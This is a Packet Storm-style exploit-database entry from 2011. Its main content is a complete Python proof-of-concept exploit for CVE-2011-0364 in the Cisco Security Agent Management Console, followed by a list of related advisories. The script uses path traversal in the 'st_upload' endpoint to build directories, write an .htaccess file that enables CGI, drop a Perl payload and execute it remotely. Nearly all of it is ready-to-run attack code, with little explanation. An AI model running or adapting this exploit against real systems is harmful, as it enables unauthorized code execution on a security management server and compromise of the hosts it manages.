Lucene search
Gerry EisenhaurPACKETSTORM:100318HistoryApr 12, 2011 - 12:00 a.m.
Cisco Security Agent Management Console Command Execution
2011-04-1200:00:00
Gerry Eisenhaur
packetstormsecurity.com
15
0.638 Medium
EPSS
Percentile
97.5%
`#!/usr/bin/env python
# Exploits Cisco Security Agent Management Console ‘st_upload’ (CVE-2011-0364)
# gerry eisenhaur <[email protected]>
import httplib
import mimetools
import StringIO
_boundary = mimetools.choose_boundary()
_host_uid = 'C087EFAE-05A2-4A0B-9512-E05E5ED84AEB'
_csamc = "192.168.0.108"
# we need to enable some scripting to get command access
htaccess = "Options +Includes +ExecCGI\r\nAddHandler cgi-script gee"
perl_path = "#!c:/program files/cisco/csamc/csamc60/perl/5.8.7/bin/mswin32-x86/perl\r\n",
backdoor = "exec \"calc.exe\";"
def send_request(params=None):
buf = StringIO.StringIO()
headers = {"Content-type": 'multipart/form-data; boundary=%s' % _boundary}
for(key, value) in params.iteritems():
buf.write('--%s\r\n' % _boundary)
buf.write('Content-Disposition: form-data; name="%s"' % key)
buf.write('\r\n\r\n%s\r\n' % value)
buf.write('--' + _boundary + '--\r\n\r\n')
body = buf.getvalue()
conn = httplib.HTTPSConnection(_csamc)
conn.request("POST", "/csamc60/agent", body, headers)
response = conn.getresponse()
print response.status, response.reason
conn.close()
def main():
### Build up required dir tree
dirtree = ["../bin/webserver/htdocs/diag/bin",
"../bin/webserver/htdocs/diag/bin/webserver",
"../bin/webserver/htdocs/diag/bin/webserver/htdocs"]
_params = {
'host_uid': _host_uid,
'jobname': None,
'host': "aa",
'diags': " ",
'diagsu': " ",
'profiler': " ",
'extension': "gee",
}
for path in dirtree:
print "[+] Creating directory: %s" % path
_params['jobname'] = path
send_request(_params)
### Done building path, drop files
print "[+] Dropping .htaccess"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/",
'diags': "",
'diagsu': "",
'profiler': htaccess,
'extension': "/../.htaccess",
})
print "[+] Dropping payload"
send_request({
'host_uid': _host_uid,
'jobname': '',
'host': "/../bin/webserver/htdocs/gerry",
'diags': perl_path,
'diagsu': "",
'profiler': backdoor,
'extension': "/../exploit.gee",
})
print "[+] Done, Executing dropped file."
try:
conn = httplib.HTTPSConnection(_csamc, timeout=1)
conn.request("GET", "/csamc60/exploit.gee")
response = conn.getresponse()
print response.status, response.reason
print response.read()
except httplib.ssl.SSLError:
pass
print "[+] Finished."
if __name__ == '__main__':
main()
`
Related
attackerkb
attackerkb
Cisco Security Agent Management Console st_upload File Creation
2011-02-19 00:00:00
saint
saint
Cisco Security Agent Management Center Code Execution
2011-03-17 00:00:00
Cisco Security Agent Management Center Code Execution
2011-03-17 00:00:00
Cisco Security Agent Management Center Code Execution
2011-03-17 00:00:00
nessus
nessus
zdt
zdt
Cisco Security Agent Management Console ‘st_upload’ RCE Exploit
2011-04-13 00:00:00
zdi
zdi
securityvulns
securityvulns
checkpoint_advisories
checkpoint_advisories
Cisco Security Agent Management Center Code Execution (CVE-2011-0364)
2011-04-03 00:00:00
exploitpack
exploitpack
Cisco Security Agent Management Console - st_upload Remote Code Execution
2011-04-12 00:00:00
seebug
seebug
Cisco Security Agent Management Console ‘st_upload’ RCE Exploit
2011-04-13 00:00:00
cve
cve
CVE-2011-0364
2011-02-19 01:00:00
cisco
cisco
prion
prion
Cross site request forgery (csrf)
2011-02-19 01:00:00
exploitdb
exploitdb